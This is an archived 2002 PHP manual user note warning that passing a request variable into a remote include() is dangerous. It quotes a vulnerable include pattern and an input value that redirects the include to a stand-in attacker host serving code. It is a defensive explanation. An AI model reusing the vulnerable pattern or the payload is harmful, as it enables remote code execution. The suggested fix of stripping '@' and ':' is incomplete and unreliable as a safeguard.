note 21273 added to features.remote-files

From: Date: Mon, 06 May 2002 06:22:35 +0000
Subject: note 21273 added to features.remote-files
Groups: php.notes 
Request: Send a blank email to php-notes+get-30250@lists.php.net to get a copy of this message
You must be VERY careful if you allow a variable to control the URL of an include()ed file. A previous poster suggested: include("http://www.php.net/".$HTTP_GET_VARS["url"]); This, however, won't work in all cases. For example, set the variable to "@www.evil-site.dom/evil-code.phps" Your carefully constructed pre-URL is now sent merely as a username to the attacker's web site. Stripping out "@" and ":" would be a good idea, and THEN you'd probably be safe. - Peter Jerde Minneapolis, Minnesota, USA -- http://www.php.net/manual/en/features.remote-files.php http://master.php.net/manage/user-notes.php?action=edit+21273 http://master.php.net/manage/user-notes.php?action=delete+21273 http://master.php.net/manage/user-notes.php?action=reject+21273

« previous php.notes (#30250) next »